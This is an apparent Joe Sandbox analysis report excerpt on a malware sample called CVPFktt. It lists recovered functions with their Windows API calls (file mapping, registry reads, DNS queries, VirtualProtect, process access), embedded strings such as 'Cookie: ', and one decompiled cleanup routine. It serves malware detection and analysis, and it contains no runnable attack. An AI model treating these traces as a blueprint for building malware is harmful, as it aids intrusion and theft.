OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001CCE4A
CloseHandle.KERNEL32(?,?,?,?,?), ref: 001CCE6D

Part of subcall function 001DDC80: GetTickCount.KERNEL32 ref: 001DDC90
Part of subcall function 001DDC80: CreateFileW.KERNEL32(001CF00E,80000000,?,001E6114,?,00000000,00000000,?,001CF00E,?,00000000,?,00000000), ref: 001DDCAD
Part of subcall function 001DDC80: GetFileSize.KERNEL32(001CF00E,00000000,Local\,00000001,?,001CF00E,?,00000000,?,00000000), ref: 001DDCD9
Part of subcall function 001DDC80: CreateFileMappingA.KERNEL32(001CF00E,001E6114,00000002,00000000,00000000,001CF00E), ref: 001DDCED
Part of subcall function 001DDC80: lstrlen.KERNEL32(001CF00E,?,001CF00E,?,00000000,?,00000000), ref: 001DDD09
Part of subcall function 001DDC80: lstrcpy.KERNEL32(?,001CF00E), ref: 001DDD19
Part of subcall function 001DDC80: HeapFree.KERNEL32(00000000,001CF00E,?,001CF00E,?,00000000,?,00000000), ref: 001DDD34
Part of subcall function 001DDC80: CloseHandle.KERNEL32(001CF00E,Local\,00000001,?,001CF00E), ref: 001DDD46

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 819032fb87735f647410cd0eb599262a16a8a02ad086da943ddaf442da423eb7
Instruction ID: 8c425aa72be3a6543e0e8debf13e61d6875eabde530a69bd877d624fba5e1424
Opcode Fuzzy Hash: 819032fb87735f647410cd0eb599262a16a8a02ad086da943ddaf442da423eb7
Instruction Fuzzy Hash: 8A212771900208EBDB21DFA5DC85EEE7BB8AF65754F10012AF929A25A1E730DD45CB90

Uniqueness

Uniqueness Score: 0.60%

Function 001C19FA, Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 001CF72C: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,?,00000000,?,?,001C1A11), ref: 001CF752

CreateFileA.KERNEL32(?,80000000,00000001,00000000,?,00000080,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 001C1A4C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 001C1A5E
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 001C1A76
CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,?,00000000), ref: 001C1A91

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 14c2b1e9b86db50fc65d2e607da66ae3de958369730805c87f703d684a2e9c8f
Instruction ID: 9409731c0c9149658fe7c571cec379e37c9568b6f807cf3fc31fe07b6ae5df26
Opcode Fuzzy Hash: 14c2b1e9b86db50fc65d2e607da66ae3de958369730805c87f703d684a2e9c8f
Instruction Fuzzy Hash: 00115E71A41159BBDB20ABA5DC89FEF7E7EEF22750F104019F904E6091D770CA80CBA0

Uniqueness

Uniqueness Score: 0.14%

Function 001C622E, Relevance: 6.1, APIs: 4, Instructions: 70networkUNIQUE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(03E58D20), ref: 001C6245
RtlLeaveCriticalSection.NTDLL(03E58D20), ref: 001C6265
DnsQuery_A.DNSAPI(?,00000001,00000000,?,?,00000000), ref: 001C629F
DnsFree.DNSAPI(?,00000001), ref: 001C62D1

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFreeLeaveQuery_
String ID:
API String ID: 2943198880-0
Opcode ID: 5dae5156fc4cab5cc77c1db5bf0dba375973cef1c08e3688c5e221146df89ad1
Instruction ID: 90df3b38f47ffd94707ee43fe5c7b0ae2c1ed427563600132f837b5de1520f3b
Opcode Fuzzy Hash: 5dae5156fc4cab5cc77c1db5bf0dba375973cef1c08e3688c5e221146df89ad1
Instruction Fuzzy Hash: 5A216D72A01294AFDB01DFE8DD85EAEBBB9EB24340F054169F601DB261DB30DD41DBA0

Uniqueness

Uniqueness Score: 100.00%

Function 001DF5E3, Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(04C2C95B,001C6A04,779F5520,001C6A04), ref: 001DF61B

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

lstrcpy.KERNEL32(00000000,04C2C95B), ref: 001DF632
StrChrA.SHLWAPI(00000000,0000002E), ref: 001DF63B
GetModuleHandleA.KERNEL32(00000000), ref: 001DF659

Part of subcall function 001CA310: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,04C2C95B,?,00000001,00000000,00000004,?,?,?), ref: 001CA3E7
Part of subcall function 001CA310: VirtualProtect.KERNEL32(?,00000004,?,?,?,00000001,00000000,00000004,?,?,?,00000000,001C84A5,001E2628,0000001C,001DF5C4), ref: 001CA402
Part of subcall function 001CA310: RtlEnterCriticalSection.NTDLL(001E6340), ref: 001CA426

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 01e58dc551fb4a27d1f97dab867f50992775562a45b5cc97e6902218130d9e48
Instruction ID: 6e6f8fad1ebaccc0f8a84cee4e65c9f1f095aa929d0831333ac80eb74376ac19
Opcode Fuzzy Hash: 01e58dc551fb4a27d1f97dab867f50992775562a45b5cc97e6902218130d9e48
Instruction Fuzzy Hash: 3C216D709002049FCB14DFA4C894BAEBBB9EF54300F10846EE5069B7A0DB74DA41DB50

Uniqueness

Uniqueness Score: 0.66%

Function 001C1AA8, Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 001C1AC3
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 001C1AE7
RegCloseKey.ADVAPI32(?), ref: 001C1B3F

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?), ref: 001C1B10

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 79646ab3d5d2535397931dd26daa2b97a031afb9ff80af75adb0f1f4a6d7822a
Instruction ID: bcbc9b4ebbb3b866bcd4614c9db83d22015f558573b18493aa4f6b4b89e096e3
Opcode Fuzzy Hash: 79646ab3d5d2535397931dd26daa2b97a031afb9ff80af75adb0f1f4a6d7822a
Instruction Fuzzy Hash: A921C7B5900108FFCB11DF94D980DEEBBBAEB55744B60806AF805AA111E7719E51DF50

Uniqueness

Uniqueness Score: 1.59%

Function 001D52F7, Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,?,00000000,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D531D
StrTrimA.SHLWAPI(?,001E2404,00000000,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D533C
StrChrA.SHLWAPI(?,?,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D534D
StrTrimA.SHLWAPI(00000001,001E2404,?,00000000,-0000000C,?,001C9225,00000000,0000002C,-0000000C,-0000000C), ref: 001D535F

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 162feed848ee8142442e5fba4dfffbb8da3640aaf1cfa060e17df6e8056d5e4a
Instruction ID: ba234df2c9c3942bad48a040a555df96990d9e282738efbad69f64cf3393a131
Opcode Fuzzy Hash: 162feed848ee8142442e5fba4dfffbb8da3640aaf1cfa060e17df6e8056d5e4a
Instruction Fuzzy Hash: 36113A75500648BFCB058F69C894EAEBFBDEB857A5F14801AF8059B241DBB4DA418BA0

Uniqueness

Uniqueness Score: 2.38%

Function 001D6EC4, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001D627C,00000000,?,?,001D0B24,?,03E58D60), ref: 001D6ECF
RtlAllocateHeap.NTDLL(00000000,?), ref: 001D6EE7
memcpy.NTDLL(00000000,03E58D60,-00000008,?,?,?,001D627C,00000000,?,?,001D0B24,?,03E58D60), ref: 001D6F2B
memcpy.NTDLL(00000001,03E58D60,00000001,001D0B24,?,03E58D60), ref: 001D6F4C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: c06dd988749f88e0fa70a37210746210102e7439233f18b2aaa300b43e95fce3
Instruction ID: 29f32bc5a045f64a5f9ff68f492dcf48fbcd24d2de548764538728c6a576f386
Opcode Fuzzy Hash: c06dd988749f88e0fa70a37210746210102e7439233f18b2aaa300b43e95fce3
Instruction Fuzzy Hash: E911E972A00154BFD710CBA9DCC5E9EBBEEDB91360B15417AF504DB291EB709E44C760

Uniqueness

Uniqueness Score: 0.43%

Function 001C1BB1, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 001D38C3: RtlAllocateHeap.NTDLL(00000000,?), ref: 001D38F2
Part of subcall function 001D38C3: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,001C1BC1,?), ref: 001D3915

HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1BEB

Part of subcall function 001DFC83: lstrlen.KERNEL32(?,00000000,00000000,779F5520), ref: 001DFC9A
Part of subcall function 001DFC83: lstrlen.KERNEL32(?), ref: 001DFCA2
Part of subcall function 001DFC83: lstrlen.KERNEL32(?), ref: 001DFD0D
Part of subcall function 001DFC83: RtlAllocateHeap.NTDLL(00000000,?), ref: 001DFD38
Part of subcall function 001DFC83: memcpy.NTDLL(00000000,00000002,?), ref: 001DFD49
Part of subcall function 001DFC83: memcpy.NTDLL(00000000,?,?), ref: 001DFD5F
Part of subcall function 001DFC83: memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 001DFD71
Part of subcall function 001DFC83: memcpy.NTDLL(00000000,001E2408,00000002,00000000,?,?,00000000,?,?), ref: 001DFD84
Part of subcall function 001DFC83: memcpy.NTDLL(00000000,?,00000002), ref: 001DFD99

HeapFree.KERNEL32(00000000,?,?,00000001), ref: 001C1C37

Strings

https://, xrefs: 001C1BFA
Cookie: , xrefs: 001C1BD3

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Heapmemcpy$Freelstrlen$Allocate
String ID: Cookie: $https://
API String ID: 2465664858-1563071917
Opcode ID: 747e3a72a2ac143f6e70a82d6929a8f2dadb35696325b7de0ef6bd4b253b59f3
Instruction ID: 2f4bdbd107067050c63bc7e816eecb1be88d3c98256ec23bbd89c827a0be2769
Opcode Fuzzy Hash: 747e3a72a2ac143f6e70a82d6929a8f2dadb35696325b7de0ef6bd4b253b59f3
Instruction Fuzzy Hash: 3B010436180658BBCB215F69CC80FAE7B69DFA6760F048018FC089B252C731DD41CAE0

Uniqueness

Uniqueness Score: 8.94%

Function 001C9E5C, Relevance: 6.1, APIs: 4, Instructions: 58threadUNIQUE

Download Yara Rule

APIs

GlobalFix.KERNEL32(00000000), ref: 001C9E9C
memset.NTDLL ref: 001C9EB0
GetWindowThreadProcessId.USER32(00000000,?), ref: 001C9EBD

Part of subcall function 001DD69E: OpenProcess.KERNEL32(00000410,?,?,00000000,00000000,?,00000000,00000000,?,?,?,001C2957,?,?,00000000), ref: 001DD6F5
Part of subcall function 001DD69E: CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104,?,?,?,001C2957,?,?,00000000), ref: 001DD713
Part of subcall function 001DD69E: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001DD779

GlobalUnWire.KERNEL32(00000000), ref: 001C9EE8

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
String ID:
API String ID: 3286078456-0
Opcode ID: 6941222ea10b7340c007eb5048803a9bca5d1e8661e243c388f0c73bf6440c16
Instruction ID: f5b8d61bb02b1b1f49c90ca540ef5f30e0d8828d13d632ee6821cdb2e19c8554
Opcode Fuzzy Hash: 6941222ea10b7340c007eb5048803a9bca5d1e8661e243c388f0c73bf6440c16
Instruction Fuzzy Hash: 6B117071900709ABD711ABF9ACDDBAE7BBDAF58B10F10401AFA05E6680DF70C940CB61

Uniqueness

Uniqueness Score: 100.00%

Function 001C6FBF, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 57stringCOMMON

Download Yara Rule

APIs

lstrcmpi.KERNEL32(?,Blocked), ref: 001C6FDB
lstrcmpi.KERNEL32(?,Main), ref: 001C7012

Strings

Blocked, xrefs: 001C6FD5
Main, xrefs: 001C700C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: Blocked$Main
API String ID: 1586166983-1966386946
Opcode ID: 92d68ecc4c3718f15f91cc6dd66b7e21b294a4f9c63bae16f52f9be6fec085d0
Instruction ID: 1e92a14a586626d6f3595f7166b1ac475a044994652abc02012719e18ca356c8
Opcode Fuzzy Hash: 92d68ecc4c3718f15f91cc6dd66b7e21b294a4f9c63bae16f52f9be6fec085d0
Instruction Fuzzy Hash: FD019E71304219AB8B10AE66AC81E6F7B6DEFB2B90704011AF90597251CB71DD118FB1

Uniqueness

Uniqueness Score: 1.97%

Function 001CD0A7, Relevance: 6.1, APIs: 4, Instructions: 54memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?), ref: 001CD0B4
RtlAllocateHeap.NTDLL(00000000,00000015), ref: 001CD0DA
lstrcpy.KERNEL32(00000014,?), ref: 001CD0FF
memcpy.NTDLL(?,?,?), ref: 001CD10C

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: AllocateHeaplstrcpylstrlenmemcpy
String ID:
API String ID: 1388643974-0
Opcode ID: f9e689416ec85612b78208190dd00af84eeb272aa31b51a787ba44210b89f57f
Instruction ID: bc46b04f29ad68176ba015fae9999754e7ba1003ad8c6118af15533ee9f8c25d
Opcode Fuzzy Hash: f9e689416ec85612b78208190dd00af84eeb272aa31b51a787ba44210b89f57f
Instruction Fuzzy Hash: 271158B150060AEFCB21CF58E884E9ABBF9FF48714F14852DF9558B661C771E904DB90

Uniqueness

Uniqueness Score: 0.98%

Function 001C8D62, Relevance: 6.1, APIs: 4, Instructions: 54memorystringtimeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,001CF37F,?,00000000,00000000), ref: 001C8D75
lstrlen.KERNEL32(03E58BC0,?,001CF37F,?,00000000,00000000), ref: 001C8D96
RtlAllocateHeap.NTDLL(00000000,00000014), ref: 001C8DAE
lstrcpy.KERNEL32(00000000,03E58BC0), ref: 001C8DC0

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
String ID:
API String ID: 1929783139-0
Opcode ID: 292a19c98b0d5be4763fb42cf8a2080bb5340d72c68edc01aee031aec99a9df7
Instruction ID: 9311e130e365fdca3109f50e05ddbff773b0efa0dd714a5c1bd467db27c7c769
Opcode Fuzzy Hash: 292a19c98b0d5be4763fb42cf8a2080bb5340d72c68edc01aee031aec99a9df7
Instruction Fuzzy Hash: 7201C876900244AFC7159BE99CC4F6FBBBC9BA8300F140169F906D7681DB74D944C761

Uniqueness

Uniqueness Score: 0.98%

Function 00417A32, Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00417A58

Part of subcall function 00417884: __fltout2.LIBCMT ref: 004178AF

__cftog_l.LIBCMT ref: 00417A7E
__cftoe_l.LIBCMT ref: 00417AB0

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 5f96b4628e806dcb88a011779903f14e1f8459bce0f62e84212c8c4a83ac7451
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 7311423204814ABBCF125E95CC45CEE3F72BF19394B688416FE5855131D23ACAB1EB85

Uniqueness

Uniqueness Score: 0.28%

Function 001D7298, Relevance: 6.0, APIs: 4, Instructions: 49sleepCOMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(001E6368), ref: 001D72A3
Sleep.KERNEL32(0000000A,?,?,?,001C88A3,00000000,?,00000029,001E60C4,001C877B,?), ref: 001D72AD
SetEvent.KERNEL32(?,?,?,001C88A3,00000000,?,00000029,001E60C4,001C877B,?), ref: 001D7304
RtlLeaveCriticalSection.NTDLL(001E6368), ref: 001D7323

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterEventLeaveSleep
String ID:
API String ID: 1925615494-0
Opcode ID: d1211b7579d30ef2f5a84e0218dec4249cc25acd132cc4d052f445841c9402e7
Instruction ID: 59c361ede19bf30471078b32941c0c8ee1bc49cb64446c57cc1f9a437c9607f9
Opcode Fuzzy Hash: d1211b7579d30ef2f5a84e0218dec4249cc25acd132cc4d052f445841c9402e7
Instruction Fuzzy Hash: DA019270644380FBD710ABE0DD85F5E7AACFB24751F900012FA05DA5E1E7B49980C761

Uniqueness

Uniqueness Score: 1.23%

Function 00401844, Relevance: 6.0, APIs: 4, Instructions: 48
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E00401844(void* __esi) {
				intOrPtr _t9;
				long _t10;
				intOrPtr _t12;
				intOrPtr* _t19;
				intOrPtr* _t20;
				intOrPtr* _t21;
				void* _t22;
				intOrPtr* _t23;
				struct _CRITICAL_SECTION* _t25;
				void* _t26;

				_t22 = __esi;
				_t25 =  *(_t26 + 0xc);
				_t9 =  *((intOrPtr*)(_t25 + 0x20));
				if(_t9 != 0) {
					__imp__RemoveVectoredExceptionHandler(_t9);
				}
				_t10 =  *(_t25 + 0x24);
				if(_t10 != 0) {
					TlsFree(_t10);
				}
				if( *_t25 != 0) {
					DeleteCriticalSection(_t25);
				}
				_t19 = _t25 + 0x18;
				_t21 =  *_t19;
				if(_t21 != _t19) {
					_push(_t22);
					do {
						_t23 = _t21;
						_t12 =  *_t23;
						_t20 =  *((intOrPtr*)(_t23 + 4));
						_t21 =  *_t21;
						 *_t20 = _t12;
						 *((intOrPtr*)(_t12 + 4)) = _t20;
						_t7 = _t23 + 0xc; // 0xc
						VirtualProtect( *(_t23 + 8) << 0xc, 1,  *_t7, _t7);
						E004010A3(_t23);
					} while (_t21 != _t19);
				}
				return E004010A3(_t25);
			}

0x00401844
0x00401846
0x0040184a
0x00401850
0x00401853
0x00401853
0x00401859
0x0040185e
0x00401861
0x00401861
0x0040186b
0x0040186e
0x0040186e
0x00401874
0x00401877
0x0040187b
0x0040187d
0x0040187e
0x0040187e
0x00401880
0x00401882
0x00401885
0x00401887
0x00401889
0x0040188c
0x0040189b
0x004018a2
0x004018a7
0x004018ab
0x004018b5

APIs

RemoveVectoredExceptionHandler.KERNEL32(?,00000000,?,00000000,00401206,00000000,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 00401853
TlsFree.KERNEL32(?,00000000,?,00000000,00401206,00000000,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 00401861
DeleteCriticalSection.KERNEL32(?,00000000,?,00000000,00401206,00000000,?,00400000,00401D89,?,00000000,?,?,?,00401BA3), ref: 0040186E
VirtualProtect.KERNEL32(?,00000001,0000000C,0000000C,00000000,00000000,?,00000000,00401206,00000000,?,00400000,00401D89,?,00000000), ref: 0040189B

Memory Dump Source

Source File: 00000005.00000002.924455277.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.924481544.0000000000407000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_CVPFktt.jbxd

Similarity

API ID: CriticalDeleteExceptionFreeHandlerProtectRemoveSectionVectoredVirtual
String ID:
API String ID: 2089334682-0
Opcode ID: b3f17b07bdf470349098b29eeeec9a5941245084cd968ba4d0a03d7eb8ff3633
Instruction ID: 632ce377e534f1470885d0ff7440499942a1ad847981a2878345cc11df3ceec1
Opcode Fuzzy Hash: b3f17b07bdf470349098b29eeeec9a5941245084cd968ba4d0a03d7eb8ff3633
Instruction Fuzzy Hash: EC0152766012049FD710AF25D948E9BBBECEF44315B00803AFA55A7360D739EA40CA64

Uniqueness

Uniqueness Score: 2.48%

Function 001C62EF, Relevance: 6.0, APIs: 4, Instructions: 48UNIQUE

Download Yara Rule

APIs

Part of subcall function 001D3574: RtlAllocateHeap.NTDLL(00000000,?,001C102C), ref: 001D3580

RtlInitializeCriticalSection.NTDLL(001E6340), ref: 001C6313
RtlInitializeCriticalSection.NTDLL(001E6320), ref: 001C6329
GetVersion.KERNEL32(?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C633A
GetModuleHandleA.KERNEL32(001E701D,?,00000000,?,?,?,?,?,001CEF2B,?,?,?,?,4D283A53), ref: 001C6367

Part of subcall function 001C7763: GetModuleHandleA.KERNEL32(NTDLL.DLL), ref: 001C7774
Part of subcall function 001C7763: LoadLibraryA.KERNEL32(NTDSAPI.DLL), ref: 001C780E
Part of subcall function 001C7763: FreeLibrary.KERNEL32(00000000), ref: 001C7819

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
String ID:
API String ID: 1711133254-0
Opcode ID: afe90b82149c03cea07d89e77d0dcac6cc75aa363fbd8ce23769c45347dc8d38
Instruction ID: 53cabe1057e1bb2ee93f363af34778e4b943ec01e7730ce31babd2ae032dd4aa
Opcode Fuzzy Hash: afe90b82149c03cea07d89e77d0dcac6cc75aa363fbd8ce23769c45347dc8d38
Instruction Fuzzy Hash: 9E0140B1A407E08BC7509FAAACC4A1D7AA5B7B57A0785413EE10E9BA60D7B04884CF51

Uniqueness

Uniqueness Score: 100.00%

Function 0041303C, Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00413048

Part of subcall function 00411A14: __getptd_noexit.LIBCMT ref: 00411A17
Part of subcall function 00411A14: __amsg_exit.LIBCMT ref: 00411A24

__amsg_exit.LIBCMT ref: 00413068
__lock.LIBCMT ref: 00413078
_free.LIBCMT ref: 004130A8

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: __amsg_exit$__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3170801528-0
Opcode ID: 80df519b5cda6da9f065afb4c462c6d826a5b9327a9f32fc4255af8ffca1047e
Instruction ID: 556a245ce020093cc6ecffba3a3a0a9885dac8b0ee9a44b1dfced57a5abea9a8
Opcode Fuzzy Hash: 80df519b5cda6da9f065afb4c462c6d826a5b9327a9f32fc4255af8ffca1047e
Instruction Fuzzy Hash: B3017071D00625ABC721AF2699057DE7AE0AF08B12F04401BE41467694C77C6EC1CBDD

Uniqueness

Uniqueness Score: 12.89%

Function 0041025D, Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00410277

Part of subcall function 0041062E: __FF_MSGBANNER.LIBCMT ref: 00410647
Part of subcall function 0041062E: __NMSG_WRITE.LIBCMT ref: 0041064E
Part of subcall function 0041062E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00412493,00000000,00000001,00000000,?,00412286,00000018,0041C488,0000000C,00412316), ref: 00410673

std::exception::exception.LIBCMT ref: 004102AC
std::exception::exception.LIBCMT ref: 004102C6
__CxxThrowException@8.LIBCMT ref: 004102D7

Memory Dump Source

Source File: 00000005.00000002.924505298.000000000040F000.00000020.00020000.sdmp, Offset: 0040F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40f000_CVPFktt.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: eb1c52cc91be2765cc19df14e270240d9cc8741b4b7f61cd735ff9af9430a2e8
Instruction ID: bafe6a0b3da7466cc52f91062b5e4fc4d7cf2bc755bc7df6bf8b867aab921528
Opcode Fuzzy Hash: eb1c52cc91be2765cc19df14e270240d9cc8741b4b7f61cd735ff9af9430a2e8
Instruction Fuzzy Hash: 47F0F93554020566CB14E715DC46ADE37A4AF81358F18807FF405E61D1EBFC8DC68B4C

Uniqueness

Uniqueness Score: 0.60%

Function 001C1C43, Relevance: 6.0, APIs: 4, Instructions: 41filestringsynchronizationCOMMON

Download Yara Rule

APIs

lstrcatW.KERNEL32(?,?), ref: 001C1C55

Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 001DB448
Part of subcall function 001DB407: GetLastError.KERNEL32 ref: 001DB452
Part of subcall function 001DB407: WaitForSingleObject.KERNEL32(000000C8), ref: 001DB477
Part of subcall function 001DB407: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 001DB498
Part of subcall function 001DB407: SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 001DB4C0
Part of subcall function 001DB407: WriteFile.KERNEL32(?,00001388,?,00000002,00000000), ref: 001DB4D5
Part of subcall function 001DB407: SetEndOfFile.KERNEL32(?), ref: 001DB4E2
Part of subcall function 001DB407: CloseHandle.KERNEL32(?), ref: 001DB4FA

WaitForSingleObject.KERNEL32(00002710,?,?,?,00000005,?,?,?,?,?), ref: 001C1C78
CreateFileW.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 001C1C9A
GetLastError.KERNEL32(?,80000000,00000000,00000000,?,00000080,00000000,?,?,?,00000005,?,?,?,?,?), ref: 001C1CAE

Memory Dump Source

Source File: 00000005.00000002.923474706.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1c0000_CVPFktt.jbxd

Yara matches

Similarity

